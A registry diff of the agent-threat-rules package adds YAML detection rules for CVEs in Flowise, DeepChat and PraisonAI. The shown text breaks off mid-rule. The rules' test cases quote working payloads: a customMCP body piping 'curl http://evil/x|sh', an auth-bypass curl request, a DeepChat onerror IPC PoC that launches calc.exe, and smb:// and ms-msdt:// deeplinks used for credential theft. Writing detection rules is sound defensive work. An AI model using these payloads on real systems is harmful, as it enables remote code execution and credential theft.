agent-threat-rules 3.5.3 → 3.5.4
This diff represents the content of publicly available package versions that have been released to one of the supported registries. The information contained in this diff is provided for informational purposes only and reflects changes between package versions as they appear in their respective public registries.
- package/README.md +1 -1
- package/package.json +2 -2
- package/rules/context-exfiltration/ATR-2026-01948-netlicensing-mcp-product-number-path-traversal-token-leak.yaml +132 -0
- package/rules/context-exfiltration/ATR-2026-01957-m365-copilot-searchleak-open-redirect-exfil.yaml +95 -0
- package/rules/context-exfiltration/ATR-2026-01961-meta-ads-mcp-unauth-token-leak.yaml +135 -0
- package/rules/context-exfiltration/ATR-2026-01964-langchain-gmailtoolkit-indirect-prompt-injection-email-exfil.yaml +99 -0
- package/rules/privilege-escalation/ATR-2026-01949-praisonai-mcpserver-unauth-tools-call.yaml +138 -0
- package/rules/privilege-escalation/ATR-2026-01974-anything-llm-data-import-access-control.yaml +93 -0
- package/rules/tool-poisoning/ATR-2026-01952-praisonai-codemode-sandbox-escape-rce.yaml +125 -0
- package/rules/tool-poisoning/ATR-2026-01953-praisonai-codemode-function-ctor-sandbox-escape.yaml +111 -0
- package/rules/tool-poisoning/ATR-2026-01959-openhuman-shell-allowlist-env-prefix-bypass.yaml +136 -0
- package/rules/tool-poisoning/ATR-2026-01963-praisonai-action-orchestrator-step-target-path-traversal-rce.yaml +99 -0
- package/rules/tool-poisoning/ATR-2026-01965-flowise-custommcp-os-command-rce.yaml +137 -0
- package/rules/tool-poisoning/ATR-2026-01967-deepchat-mermaid-xss-rce-ipc-mcp-register.yaml +97 -0
- package/rules/tool-poisoning/ATR-2026-01968-deepchat-markdown-deeplink-openexternal-rce-bypass.yaml +149 -0
- package/rules/tool-poisoning/ATR-2026-01970-praisonai-filetools-normpath-path-traversal.yaml +111 -0
- package/rules/tool-poisoning/ATR-2026-01973-anythingllm-logo-endpoint-path-traversal.yaml +95 -0
- package/rules/tool-poisoning/ATR-2026-01978-anythingllm-collector-process-filename-path-traversal-delete.yaml +95 -0
- package/rules/tool-poisoning/ATR-2026-01979-pandasai-prompt-injection-dunder-sandbox-escape-rce.yaml +105 -0
|
@@ -0,0 +1,137 @@
|
|
|
1
|
+
title: "Flowise Custom MCP node-load-method OS Command RCE (CVE-2025-8943)"
|
|
2
|
+
id: ATR-2026-01965
|
|
3
|
+
rule_version: 1
|
|
4
|
+
status: draft
|
|
5
|
+
description: >
|
|
6
|
+
Detects CVE-2025-8943 (CVSS 9.8 CRITICAL, CWE-78): Flowise < 3.0.1 exposes the
|
|
7
|
+
Custom MCP feature via the POST /api/v1/node-load-method/customMCP endpoint,
|
|
8
|
+
which passes inputs.mcpServerConfig.command + args directly into StdioClientTransport
|
|
9
|
+
(unsandboxed OS exec). With loadMethod set to "listActions" and no FLOWISE_USERNAME/
|
|
10
|
+
PASSWORD configured, an attacker reaches RCE unauthenticated using the
|
|
11
|
+
x-request-from: internal header. This rule keys on the specific endpoint path, the
|
|
12
|
+
mcpServerConfig+loadMethod:listActions exploit triple, and the internal-header auth
|
|
13
|
+
bypass — NOT on generic command/args MCP config which is benign and ubiquitous.
|
|
14
|
+
author: "ATR Community"
|
|
15
|
+
date: "2026/06/29"
|
|
16
|
+
schema_version: "0.1"
|
|
17
|
+
detection_tier: pattern
|
|
18
|
+
maturity: test
|
|
19
|
+
severity: critical
|
|
20
|
+
references:
|
|
21
|
+
owasp_llm:
|
|
22
|
+
- "LLM06:2025 - Excessive Agency"
|
|
23
|
+
owasp_agentic:
|
|
24
|
+
- "ASI06:2026 - Tool Misuse"
|
|
25
|
+
mitre_atlas:
|
|
26
|
+
- "AML.T0049 - Exploit Public-Facing Application"
|
|
27
|
+
mitre_attack:
|
|
28
|
+
- "T1190 - Exploit Public-Facing Application"
|
|
29
|
+
cve:
|
|
30
|
+
- "CVE-2025-8943"
|
|
31
|
+
metadata_provenance:
|
|
32
|
+
mitre_atlas: human-reviewed
|
|
33
|
+
owasp_llm: human-reviewed
|
|
34
|
+
owasp_agentic: human-reviewed
|
|
35
|
+
compliance:
|
|
36
|
+
eu_ai_act:
|
|
37
|
+
- article: "15"
|
|
38
|
+
context: "Article 15 (accuracy, robustness, cybersecurity) — runtime detection of this technique is a cybersecurity control for high-risk AI systems. Technique: Flowise Custom MCP node-load-method OS Command RCE (CVE-2025-8943)."
|
|
39
|
+
strength: primary
|
|
40
|
+
- article: "9"
|
|
41
|
+
context: "Article 9 (risk management system) requires identified risks to be addressed by appropriate measures; this rule is a runtime risk-treatment control. Technique: Flowise Custom MCP node-load-method OS Command RCE (CVE-2025-8943)."
|
|
42
|
+
strength: secondary
|
|
43
|
+
nist_ai_rmf:
|
|
44
|
+
- subcategory: "MP.5.1"
|
|
45
|
+
context: "NIST AI RMF MAP 5.1 — likelihood and impact of the identified attack are characterised; this rule detects the adversarial input at runtime. Technique: Flowise Custom MCP node-load-method OS Command RCE (CVE-2025-8943)."
|
|
46
|
+
strength: primary
|
|
47
|
+
- subcategory: "MG.3.2"
|
|
48
|
+
context: "NIST AI RMF MANAGE 3.2 — runtime monitoring/maintenance control that surfaces this attack class. Technique: Flowise Custom MCP node-load-method OS Command RCE (CVE-2025-8943)."
|
|
49
|
+
strength: secondary
|
|
50
|
+
iso_42001:
|
|
51
|
+
- clause: "8.1"
|
|
52
|
+
context: "ISO/IEC 42001 Clause 8.1 (operational planning and control) — detection of this payload is an operational control. Technique: Flowise Custom MCP node-load-method OS Command RCE (CVE-2025-8943)."
|
|
53
|
+
strength: primary
|
|
54
|
+
- clause: "8.3"
|
|
55
|
+
context: "ISO/IEC 42001 Clause 8.3 (AI risk treatment) — this rule implements runtime detection as a treatment control. Technique: Flowise Custom MCP node-load-method OS Command RCE (CVE-2025-8943)."
|
|
56
|
+
strength: secondary
|
|
57
|
+
tags:
|
|
58
|
+
category: tool-poisoning
|
|
59
|
+
subcategory: flowise-custommcp-os-command-rce
|
|
60
|
+
scan_target: both
|
|
61
|
+
confidence: high
|
|
62
|
+
source: cve-disclosure
|
|
63
|
+
vendor_sources: flowise-cve-2025-8943
|
|
64
|
+
agent_source:
|
|
65
|
+
type: llm_io
|
|
66
|
+
framework:
|
|
67
|
+
- any
|
|
68
|
+
provider:
|
|
69
|
+
- any
|
|
70
|
+
detection:
|
|
71
|
+
condition: any
|
|
72
|
+
false_positives:
|
|
73
|
+
- "Legitimate Flowise Custom MCP node configuring a real local MCP server (e.g. command npx, args @modelcontextprotocol/server-filesystem) without the listActions loadMethod probe shape."
|
|
74
|
+
- "Generic MCP server JSON config containing command/args keys, which is standard and benign across thousands of MCP clients."
|
|
75
|
+
- "Flowise documentation or patch advisory referencing the node-load-method endpoint without an exploit payload or the internal auth-bypass header."
|
|
76
|
+
conditions:
|
|
77
|
+
- field: content
|
|
78
|
+
operator: regex
|
|
79
|
+
value: '(?i)node-load-method/customMCP[\s\S]{0,400}mcpServerConfig[\s\S]{0,400}["\x27]?loadMethod["\x27]?\s*[:=]\s*["\x27]listActions["\x27]'
|
|
80
|
+
description: >
|
|
81
|
+
Flowise customMCP node-load-method endpoint combined with the
|
|
82
|
+
mcpServerConfig payload and loadMethod:listActions probe — the exact
|
|
83
|
+
CVE-2025-8943 RCE request shape
|
|
84
|
+
- field: content
|
|
85
|
+
operator: regex
|
|
86
|
+
value: '(?i)mcpServerConfig["\x27]?\s*:\s*\{[\s\S]{0,200}["\x27]command["\x27]?\s*:[\s\S]{0,300}["\x27]?loadMethod["\x27]?\s*:\s*["\x27]listActions["\x27]'
|
|
87
|
+
description: >
|
|
88
|
+
inputs.mcpServerConfig.command JSON body paired with loadMethod
|
|
89
|
+
listActions — the Custom MCP command-exec trigger used in the PoC
|
|
90
|
+
- field: content
|
|
91
|
+
operator: regex
|
|
92
|
+
value: '(?i)x-request-from\s*:\s*internal[\s\S]{0,300}(?:node-load-method/customMCP|mcpServerConfig)'
|
|
93
|
+
description: >
|
|
94
|
+
x-request-from: internal auth-bypass header combined with the customMCP
|
|
95
|
+
endpoint or mcpServerConfig — unauthenticated RCE path for default installs
|
|
96
|
+
- field: content
|
|
97
|
+
operator: regex
|
|
98
|
+
value: '(?i)CVE-2025-8943[\s\S]{0,200}(?:customMCP|mcpServerConfig|node-load-method|StdioClientTransport|listActions)'
|
|
99
|
+
description: "explicit CVE framing tied to the Flowise customMCP sink"
|
|
100
|
+
response:
|
|
101
|
+
actions:
|
|
102
|
+
- alert
|
|
103
|
+
- block_input
|
|
104
|
+
message_template: >
|
|
105
|
+
[ATR-2026-01965] CRITICAL: Flowise Custom MCP RCE (CVE-2025-8943, CVSS 9.8) —
|
|
106
|
+
node-load-method/customMCP runs mcpServerConfig.command/args via
|
|
107
|
+
StdioClientTransport, reachable unauthenticated with x-request-from: internal.
|
|
108
|
+
Block this input and upgrade Flowise to >= 3.0.1 (flowise-components >= 3.0.8).
|
|
109
|
+
confidence: 85
|
|
110
|
+
wild_fp_rate: 0
|
|
111
|
+
test_cases:
|
|
112
|
+
true_positives:
|
|
113
|
+
- input: 'POST /api/v1/node-load-method/customMCP {"inputs":{"mcpServerConfig":{"command":"touch","args":["/tmp/yofitofi"]}},"loadMethod":"listActions"}'
|
|
114
|
+
expected: triggered
|
|
115
|
+
description: "Exact JFrog PoC: customMCP endpoint + mcpServerConfig command/args + loadMethod listActions"
|
|
116
|
+
- input: '{"inputs": {"mcpServerConfig": {"command": "bash", "args": ["-c", "curl http://evil/x|sh"]}}, "loadMethod": "listActions"}'
|
|
117
|
+
expected: triggered
|
|
118
|
+
description: "mcpServerConfig.command bash reverse-shell payload with the listActions trigger"
|
|
119
|
+
- input: 'curl -H "x-request-from: internal" http://target:3000/api/v1/node-load-method/customMCP -d @payload --mcpServerConfig command'
|
|
120
|
+
expected: triggered
|
|
121
|
+
description: "Unauthenticated exploit using x-request-from internal header against the customMCP endpoint"
|
|
122
|
+
- input: "CVE-2025-8943 Flowise RCE: send mcpServerConfig command/args to node-load-method/customMCP with loadMethod listActions"
|
|
123
|
+
expected: triggered
|
|
124
|
+
description: "Attack-framing text tying CVE-2025-8943 to the customMCP sink"
|
|
125
|
+
true_negatives:
|
|
126
|
+
- input: '{"command": "npx", "args": ["-y", "@modelcontextprotocol/server-filesystem", "/data"]}'
|
|
127
|
+
expected: not_triggered
|
|
128
|
+
description: "Standard benign MCP server config with command/args but no Flowise endpoint, mcpServerConfig, or listActions"
|
|
129
|
+
- input: 'In Flowise, the node-load-method endpoint loads available node parameters when you open a node in the canvas editor.'
|
|
130
|
+
expected: not_triggered
|
|
131
|
+
description: "Benign mention of the node-load-method endpoint with no mcpServerConfig payload or loadMethod listActions"
|
|
132
|
+
- input: '{"mcpServerConfig": {"command": "npx", "args": ["@my-org/mcp-server"]}, "loadMethod": "loadConfig"}'
|
|
133
|
+
expected: not_triggered
|
|
134
|
+
description: "Real Custom MCP config wiring a legitimate server — loadMethod is not the listActions probe used by the exploit"
|
|
135
|
+
- input: "Upgrade Flowise to 3.0.1 to patch CVE-2025-8943; the fix adds authentication to the Custom MCP node."
|
|
136
|
+
expected: not_triggered
|
|
137
|
+
description: "Mitigation advisory referencing the CVE without any exploit payload or auth-bypass header"
|
|
@@ -0,0 +1,97 @@
|
|
|
1
|
+
title: "DeepChat Mermaid XSS to RCE via Electron IPC MCP Server Registration (CVE-2025-66481 / GHSA-h9f5-7hhf-fqm4)"
|
|
2
|
+
id: ATR-2026-01967
|
|
3
|
+
rule_version: 1
|
|
4
|
+
status: draft
|
|
5
|
+
description: >
|
|
6
|
+
Detects CVE-2025-66481 (CVSS 9.6 CRITICAL): DeepChat <= 0.5.1 incompletely
|
|
7
|
+
sanitizes Mermaid diagram content in MermaidArtifact.vue. The sanitizer regex
|
|
8
|
+
/on\w+\s*=\s*["'][^"']*["']/ only strips QUOTED event-handler attributes, so an
|
|
9
|
+
unquoted handler (e.g. `<audio src=x onerror=...>`) survives and executes in the
|
|
10
|
+
Electron renderer. The PoC handler invokes window.electron.ipcRenderer.invoke
|
|
11
|
+
('presenter:call','mcpPresenter','addMcpServer',...) then 'startServer' to register
|
|
12
|
+
and launch a malicious stdio MCP server (command:'calc.exe'), escalating stored
|
|
13
|
+
XSS to remote code execution. This rule keys on the unquoted-onerror + IPC
|
|
14
|
+
presenter:call mcpPresenter addMcpServer/startServer tokens, not on Mermaid alone.
|
|
15
|
+
author: "ATR Community"
|
|
16
|
+
date: "2026/06/29"
|
|
17
|
+
schema_version: "0.1"
|
|
18
|
+
detection_tier: pattern
|
|
19
|
+
maturity: test
|
|
20
|
+
severity: critical
|
|
21
|
+
references:
|
|
22
|
+
owasp_llm: ["LLM06:2025 - Excessive Agency"]
|
|
23
|
+
owasp_agentic: ["ASI06:2026 - Tool Misuse"]
|
|
24
|
+
mitre_atlas: ["AML.T0049 - Exploit Public-Facing Application"]
|
|
25
|
+
mitre_attack: ["T1190 - Exploit Public-Facing Application"]
|
|
26
|
+
cve: ["CVE-2025-66481"]
|
|
27
|
+
metadata_provenance: { mitre_atlas: human-reviewed, owasp_llm: human-reviewed, owasp_agentic: human-reviewed }
|
|
28
|
+
compliance:
|
|
29
|
+
eu_ai_act:
|
|
30
|
+
- article: "15"
|
|
31
|
+
context: "Article 15 (accuracy, robustness, cybersecurity) — runtime detection of this technique is a cybersecurity control for high-risk AI systems. Technique: DeepChat Mermaid XSS to RCE via Electron IPC MCP Server Registration (CVE-2025-66481 / GHSA-h9f5-7hhf-fqm4)."
|
|
32
|
+
strength: primary
|
|
33
|
+
- article: "9"
|
|
34
|
+
context: "Article 9 (risk management system) requires identified risks to be addressed by appropriate measures; this rule is a runtime risk-treatment control. Technique: DeepChat Mermaid XSS to RCE via Electron IPC MCP Server Registration (CVE-2025-66481 / GHSA-h9f5-7hhf-fqm4)."
|
|
35
|
+
strength: secondary
|
|
36
|
+
nist_ai_rmf:
|
|
37
|
+
- subcategory: "MP.5.1"
|
|
38
|
+
context: "NIST AI RMF MAP 5.1 — likelihood and impact of the identified attack are characterised; this rule detects the adversarial input at runtime. Technique: DeepChat Mermaid XSS to RCE via Electron IPC MCP Server Registration (CVE-2025-66481 / GHSA-h9f5-7hhf-fqm4)."
|
|
39
|
+
strength: primary
|
|
40
|
+
- subcategory: "MG.3.2"
|
|
41
|
+
context: "NIST AI RMF MANAGE 3.2 — runtime monitoring/maintenance control that surfaces this attack class. Technique: DeepChat Mermaid XSS to RCE via Electron IPC MCP Server Registration (CVE-2025-66481 / GHSA-h9f5-7hhf-fqm4)."
|
|
42
|
+
strength: secondary
|
|
43
|
+
iso_42001:
|
|
44
|
+
- clause: "8.1"
|
|
45
|
+
context: "ISO/IEC 42001 Clause 8.1 (operational planning and control) — detection of this payload is an operational control. Technique: DeepChat Mermaid XSS to RCE via Electron IPC MCP Server Registration (CVE-2025-66481 / GHSA-h9f5-7hhf-fqm4)."
|
|
46
|
+
strength: primary
|
|
47
|
+
- clause: "8.3"
|
|
48
|
+
context: "ISO/IEC 42001 Clause 8.3 (AI risk treatment) — this rule implements runtime detection as a treatment control. Technique: DeepChat Mermaid XSS to RCE via Electron IPC MCP Server Registration (CVE-2025-66481 / GHSA-h9f5-7hhf-fqm4)."
|
|
49
|
+
strength: secondary
|
|
50
|
+
tags: { category: tool-poisoning, subcategory: mermaid-xss-ipc-rce, scan_target: both, confidence: high, source: cve-disclosure, vendor_sources: deepchat-cve-2025-66481 }
|
|
51
|
+
agent_source: { type: llm_io, framework: [any], provider: [any] }
|
|
52
|
+
detection:
|
|
53
|
+
condition: any
|
|
54
|
+
false_positives:
|
|
55
|
+
- "A legitimate Mermaid diagram (graph/flowchart/sequenceDiagram) with node labels and no event-handler attributes or IPC calls."
|
|
56
|
+
- "DeepChat source/docs discussing the electron.ipcRenderer presenter bridge or mcpPresenter API without an embedded onerror handler payload."
|
|
57
|
+
- "A normal addMcpServer config object with command:'npx' that is not wrapped inside an HTML event handler attribute."
|
|
58
|
+
conditions:
|
|
59
|
+
- field: content
|
|
60
|
+
operator: regex
|
|
61
|
+
value: '(?i)<\s*(?:audio|img|video|svg|image|object|input|body|details)\b[^>]*\bon\w+\s*=\s*[^"''\s>][^>]*?(?:electron\.)?ipcRenderer\.invoke\s*\(\s*[''"]presenter:call[''"]'
|
|
62
|
+
description: "one line: HTML tag with an UNQUOTED event handler whose body calls ipcRenderer.invoke('presenter:call' — the CVE-2025-66481 sanitizer-bypass + IPC sink"
|
|
63
|
+
- field: content
|
|
64
|
+
operator: regex
|
|
65
|
+
value: '(?i)ipcRenderer\.invoke\([^)]*[''"]mcpPresenter[''"][^)]*[''"](?:addMcpServer|startServer)[''"]'
|
|
66
|
+
description: "one line: Electron IPC presenter:call into mcpPresenter registering/starting an MCP server — the RCE escalation primitive"
|
|
67
|
+
- field: content
|
|
68
|
+
operator: regex
|
|
69
|
+
value: '(?i)CVE-2025-66481[\s\S]{0,200}(?:mermaid|MermaidArtifact|onerror|ipcRenderer|mcpPresenter)'
|
|
70
|
+
description: "explicit CVE framing"
|
|
71
|
+
response:
|
|
72
|
+
actions: [alert, block_input]
|
|
73
|
+
message_template: >
|
|
74
|
+
[ATR-2026-01967] CRITICAL: DeepChat Mermaid XSS bypass (CVE-2025-66481) escalates to RCE by registering a malicious MCP server via electron ipcRenderer. Block and upgrade past 0.5.1.
|
|
75
|
+
confidence: 85
|
|
76
|
+
wild_fp_rate: 0
|
|
77
|
+
test_cases:
|
|
78
|
+
true_positives:
|
|
79
|
+
- input: "<audio src=x onerror=window.electron.ipcRenderer.invoke('presenter:call','mcpPresenter','addMcpServer','test',{command:'calc.exe',args:[],type:'stdio',enabled:true,name:'test'}).then(()=>window.electron.ipcRenderer.invoke('presenter:call','mcpPresenter','startServer','test'))>"
|
|
80
|
+
expected: triggered
|
|
81
|
+
description: "Exact CVE-2025-66481 PoC: unquoted onerror on <audio> survives the sanitizer and invokes mcpPresenter addMcpServer/startServer for RCE"
|
|
82
|
+
- input: "graph TD; A[<img src=x onerror=electron.ipcRenderer.invoke('presenter:call','mcpPresenter','addMcpServer','x',{command:'powershell',args:[],type:'stdio'})>]"
|
|
83
|
+
expected: triggered
|
|
84
|
+
description: "Same bypass inside a Mermaid node label using <img> unquoted onerror into the mcpPresenter IPC sink"
|
|
85
|
+
- input: "window.electron.ipcRenderer.invoke('presenter:call','mcpPresenter','startServer','test')"
|
|
86
|
+
expected: triggered
|
|
87
|
+
description: "The IPC escalation primitive that launches the attacker-registered MCP server"
|
|
88
|
+
true_negatives:
|
|
89
|
+
- input: "graph TD; A[Start] --> B[Process] --> C[End]"
|
|
90
|
+
expected: not_triggered
|
|
91
|
+
description: "Benign Mermaid flowchart with plain node labels, no event handler or IPC call"
|
|
92
|
+
- input: "DeepChat uses electron.ipcRenderer for its presenter bridge; see mcpPresenter docs for how addMcpServer registers a server."
|
|
93
|
+
expected: not_triggered
|
|
94
|
+
description: "Documentation mentioning the presenter/mcpPresenter API without an unquoted onerror handler or the invoke() call shape"
|
|
95
|
+
- input: "<img src=\"diagram.png\" onerror=\"showFallback()\" alt=\"architecture\">"
|
|
96
|
+
expected: not_triggered
|
|
97
|
+
description: "Legitimate quoted onerror fallback handler with no ipcRenderer/presenter:call payload"
|
package/rules/tool-poisoning/ATR-2026-01968-deepchat-markdown-deeplink-openexternal-rce-bypass.yaml
ADDED
|
@@ -0,0 +1,149 @@
|
|
|
1
|
+
title: "DeepChat Markdown Deeplink shell.openExternal Protocol Bypass RCE (CVE-2026-43899, GHSA-cp8j-jx7q-7r5f)"
|
|
2
|
+
id: ATR-2026-01968
|
|
3
|
+
rule_version: 1
|
|
4
|
+
status: draft
|
|
5
|
+
description: >
|
|
6
|
+
Detects CVE-2026-43899 / GHSA-cp8j-jx7q-7r5f (CRITICAL): incomplete fix of
|
|
7
|
+
CVE-2025-55733 in ThinkInAIXYZ/deepchat (< 1.0.4-beta.1). The native Electron
|
|
8
|
+
window handler in src/main/presenter/tabPresenter.ts calls shell.openExternal(url)
|
|
9
|
+
inside setWindowOpenHandler() without the ALLOWED_PROTOCOLS check that exists in
|
|
10
|
+
the renderer preload, so a Markdown link rendered with target="_blank" reaches
|
|
11
|
+
the OS protocol handler unsanitised. A poisoned LLM API response (e.g. from a
|
|
12
|
+
custom /v1/chat/completions endpoint) returns Markdown such as
|
|
13
|
+
"[click here](calculator://)" or "[open](smb://attacker/share)" to launch
|
|
14
|
+
arbitrary protocol handlers (calculator://, smb://, ms-msdt://, bash://,
|
|
15
|
+
file://) for host-level code execution and NTLM credential theft over SMB.
|
|
16
|
+
author: "ATR Community"
|
|
17
|
+
date: "2026/06/29"
|
|
18
|
+
schema_version: "0.1"
|
|
19
|
+
detection_tier: pattern
|
|
20
|
+
maturity: test
|
|
21
|
+
severity: critical
|
|
22
|
+
references:
|
|
23
|
+
owasp_llm:
|
|
24
|
+
- "LLM06:2025 - Excessive Agency"
|
|
25
|
+
- "LLM05:2025 - Improper Output Handling"
|
|
26
|
+
owasp_agentic:
|
|
27
|
+
- "ASI06:2026 - Tool Misuse"
|
|
28
|
+
- "ASI05:2026 - Unexpected Code Execution"
|
|
29
|
+
mitre_atlas:
|
|
30
|
+
- "AML.T0049 - Exploit Public-Facing Application"
|
|
31
|
+
mitre_attack:
|
|
32
|
+
- "T1190 - Exploit Public-Facing Application"
|
|
33
|
+
- "T1204.001 - User Execution: Malicious Link"
|
|
34
|
+
cve:
|
|
35
|
+
- "CVE-2026-43899"
|
|
36
|
+
- "GHSA-cp8j-jx7q-7r5f"
|
|
37
|
+
metadata_provenance:
|
|
38
|
+
mitre_atlas: human-reviewed
|
|
39
|
+
owasp_llm: human-reviewed
|
|
40
|
+
owasp_agentic: human-reviewed
|
|
41
|
+
compliance:
|
|
42
|
+
eu_ai_act:
|
|
43
|
+
- article: "15"
|
|
44
|
+
context: "Article 15 (accuracy, robustness, cybersecurity) — runtime detection of this technique is a cybersecurity control for high-risk AI systems. Technique: DeepChat Markdown Deeplink shell.openExternal Protocol Bypass RCE (CVE-2026-43899, GHSA-cp8j-jx7q-7r5f)."
|
|
45
|
+
strength: primary
|
|
46
|
+
- article: "9"
|
|
47
|
+
context: "Article 9 (risk management system) requires identified risks to be addressed by appropriate measures; this rule is a runtime risk-treatment control. Technique: DeepChat Markdown Deeplink shell.openExternal Protocol Bypass RCE (CVE-2026-43899, GHSA-cp8j-jx7q-7r5f)."
|
|
48
|
+
strength: secondary
|
|
49
|
+
nist_ai_rmf:
|
|
50
|
+
- subcategory: "MP.5.1"
|
|
51
|
+
context: "NIST AI RMF MAP 5.1 — likelihood and impact of the identified attack are characterised; this rule detects the adversarial input at runtime. Technique: DeepChat Markdown Deeplink shell.openExternal Protocol Bypass RCE (CVE-2026-43899, GHSA-cp8j-jx7q-7r5f)."
|
|
52
|
+
strength: primary
|
|
53
|
+
- subcategory: "MG.3.2"
|
|
54
|
+
context: "NIST AI RMF MANAGE 3.2 — runtime monitoring/maintenance control that surfaces this attack class. Technique: DeepChat Markdown Deeplink shell.openExternal Protocol Bypass RCE (CVE-2026-43899, GHSA-cp8j-jx7q-7r5f)."
|
|
55
|
+
strength: secondary
|
|
56
|
+
iso_42001:
|
|
57
|
+
- clause: "8.1"
|
|
58
|
+
context: "ISO/IEC 42001 Clause 8.1 (operational planning and control) — detection of this payload is an operational control. Technique: DeepChat Markdown Deeplink shell.openExternal Protocol Bypass RCE (CVE-2026-43899, GHSA-cp8j-jx7q-7r5f)."
|
|
59
|
+
strength: primary
|
|
60
|
+
- clause: "8.3"
|
|
61
|
+
context: "ISO/IEC 42001 Clause 8.3 (AI risk treatment) — this rule implements runtime detection as a treatment control. Technique: DeepChat Markdown Deeplink shell.openExternal Protocol Bypass RCE (CVE-2026-43899, GHSA-cp8j-jx7q-7r5f)."
|
|
62
|
+
strength: secondary
|
|
63
|
+
tags:
|
|
64
|
+
category: tool-poisoning
|
|
65
|
+
subcategory: markdown-deeplink-protocol-handler-rce
|
|
66
|
+
scan_target: both
|
|
67
|
+
confidence: high
|
|
68
|
+
source: cve-disclosure
|
|
69
|
+
vendor_sources: deepchat-cve-2026-43899
|
|
70
|
+
agent_source:
|
|
71
|
+
type: llm_io
|
|
72
|
+
framework:
|
|
73
|
+
- any
|
|
74
|
+
provider:
|
|
75
|
+
- any
|
|
76
|
+
detection:
|
|
77
|
+
condition: any
|
|
78
|
+
false_positives:
|
|
79
|
+
- "Benign Markdown link to an https:// or http:// web page, e.g. [docs](https://example.com)."
|
|
80
|
+
- "Legitimate [open file](file:///Users/me/report.pdf) link to a local document with no UNC/SMB host."
|
|
81
|
+
- "Mitigation advisory text recommending upgrade to deepchat 1.0.4-beta.1 without a deeplink payload."
|
|
82
|
+
- "Electron docs describing setWindowOpenHandler returning { action: 'deny' } with a proper protocol allowlist."
|
|
83
|
+
conditions:
|
|
84
|
+
- field: content
|
|
85
|
+
operator: regex
|
|
86
|
+
value: '(?i)\]\(\s*(?:calculator|smb|ms-msdt|search-ms|ms-officecmd|bash|sh|cmd|vbscript|jar|tel|telnet)://[^)\s]*\)'
|
|
87
|
+
description: >
|
|
88
|
+
Markdown link whose target is a dangerous OS protocol handler scheme
|
|
89
|
+
(calculator/smb/ms-msdt/bash/etc.) — the CVE-2026-43899 deeplink payload
|
|
90
|
+
shape that bypasses shell.openExternal protocol validation.
|
|
91
|
+
- field: content
|
|
92
|
+
operator: regex
|
|
93
|
+
value: '(?i)\]\(\s*(?:file|smb)://(?://|\\\\|[a-z0-9._-]+/[a-z0-9$._-]+)[^)\s]*\)'
|
|
94
|
+
description: >
|
|
95
|
+
Markdown link to a UNC / SMB share path (file://// , file://host/share,
|
|
96
|
+
smb://host/share) used to trigger NTLM credential leak over SMB.
|
|
97
|
+
- field: content
|
|
98
|
+
operator: regex
|
|
99
|
+
value: '(?i)setWindowOpenHandler\s*\([^)]*\)[\s\S]{0,200}shell\.openExternal\s*\(\s*url'
|
|
100
|
+
description: >
|
|
101
|
+
Vulnerable native sink: setWindowOpenHandler passing the raw url to
|
|
102
|
+
shell.openExternal without an ALLOWED_PROTOCOLS check (tabPresenter.ts).
|
|
103
|
+
- field: content
|
|
104
|
+
operator: regex
|
|
105
|
+
value: '(?i)(?:CVE-2026-43899|GHSA-cp8j-jx7q-7r5f|CVE-2025-55733)[\s\S]{0,200}(?:openExternal|setWindowOpenHandler|protocol\s*bypass|deeplink|calculator://|smb://|ms-msdt)'
|
|
106
|
+
description: "explicit CVE/GHSA framing combined with the bypass sink or deeplink token"
|
|
107
|
+
response:
|
|
108
|
+
actions:
|
|
109
|
+
- alert
|
|
110
|
+
- block_input
|
|
111
|
+
message_template: >
|
|
112
|
+
[ATR-2026-01968] CRITICAL: DeepChat Markdown deeplink protocol-handler RCE
|
|
113
|
+
(CVE-2026-43899 / GHSA-cp8j-jx7q-7r5f). A Markdown link to a dangerous URL
|
|
114
|
+
scheme (calculator://, smb://, ms-msdt://, file:// UNC) reaches
|
|
115
|
+
shell.openExternal via setWindowOpenHandler without protocol validation,
|
|
116
|
+
enabling host-level code execution and NTLM credential theft over SMB.
|
|
117
|
+
Block this content and upgrade deepchat to >= 1.0.4-beta.1.
|
|
118
|
+
confidence: 80
|
|
119
|
+
wild_fp_rate: 0
|
|
120
|
+
test_cases:
|
|
121
|
+
true_positives:
|
|
122
|
+
- input: "Please [click here to open the application](calculator://)."
|
|
123
|
+
expected: triggered
|
|
124
|
+
description: "Exact PoC Markdown deeplink launching the calculator:// protocol handler"
|
|
125
|
+
- input: "Done! [open](smb://attacker.example.com/share/payload) to finish setup."
|
|
126
|
+
expected: triggered
|
|
127
|
+
description: "SMB UNC deeplink for NTLM credential theft via Markdown link"
|
|
128
|
+
- input: "Run this fix [here](ms-msdt://id=PCWDiagnostic) right now."
|
|
129
|
+
expected: triggered
|
|
130
|
+
description: "ms-msdt:// (Follina-style) protocol handler in a Markdown link"
|
|
131
|
+
- input: "webContents.setWindowOpenHandler(({ url }) => { shell.openExternal(url); return { action: 'deny' } })"
|
|
132
|
+
expected: triggered
|
|
133
|
+
description: "Vulnerable tabPresenter.ts sink passing raw url to shell.openExternal"
|
|
134
|
+
- input: "CVE-2026-43899: incomplete CVE-2025-55733 fix lets a deeplink reach shell.openExternal via setWindowOpenHandler"
|
|
135
|
+
expected: triggered
|
|
136
|
+
description: "Explicit CVE framing with the named bypass sink"
|
|
137
|
+
true_negatives:
|
|
138
|
+
- input: "See the [DeepChat docs](https://deepchat.thinkinai.xyz/guide) for setup."
|
|
139
|
+
expected: not_triggered
|
|
140
|
+
description: "Benign https:// Markdown link, not a dangerous protocol handler"
|
|
141
|
+
- input: "Attached: [quarterly report](file:///Users/me/Documents/q3.pdf)"
|
|
142
|
+
expected: not_triggered
|
|
143
|
+
description: "Legitimate local file:// link to a document, no UNC/SMB host"
|
|
144
|
+
- input: "Upgrade DeepChat to 1.0.4-beta.1 to fix CVE-2026-43899."
|
|
145
|
+
expected: not_triggered
|
|
146
|
+
description: "Mitigation advice mentioning the CVE without any deeplink or sink token"
|
|
147
|
+
- input: "We sanitise URLs in setWindowOpenHandler by checking parsed.protocol against ALLOWED_PROTOCOLS before returning { action: 'deny' }."
|
|
148
|
+
expected: not_triggered
|
|
149
|
+
description: "Correct handler with protocol allowlist, no raw url passed to openExternal"
|
|
@@ -0,0 +1,111 @@
|
|
|
1
|
+
title: "PraisonAI FileTools _validate_path normpath Path Traversal (CVE-2026-35615 / GHSA-693f-pf34-72c5)"
|
|
2
|
+
id: ATR-2026-01970
|
|
3
|
+
rule_version: 1
|
|
4
|
+
status: draft
|
|
5
|
+
description: >
|
|
6
|
+
Detects exploitation of CVE-2026-35615 (GHSA-693f-pf34-72c5, CWE-22, CVSS 9.2)
|
|
7
|
+
in PraisonAI < 1.5.113. FileTools._validate_path() calls os.path.normpath()
|
|
8
|
+
